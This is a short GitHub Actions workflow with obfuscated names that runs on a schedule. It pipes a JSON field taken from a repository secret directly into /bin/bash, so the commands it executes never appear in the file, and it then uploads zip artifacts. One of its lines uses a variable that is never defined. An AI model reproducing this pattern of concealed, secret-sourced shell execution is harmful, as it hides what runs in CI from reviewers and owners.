name: jiaanjiangxian
on:
  workflow_dispatch:

  schedule:
    - cron: '30 5,11,17,23 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jiaanjiangxian
        env:
          gonbp20: ${{ secrets.gonbp20 }}
        run: |
          printf '%s' "$gonbp20" | jq -r .ulj70 | /bin/bash
          printf '%s' "$flv1594" | jq -r .ufx97567 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: fB65TJWR
          path: "*.zip"
          retention-days: 1
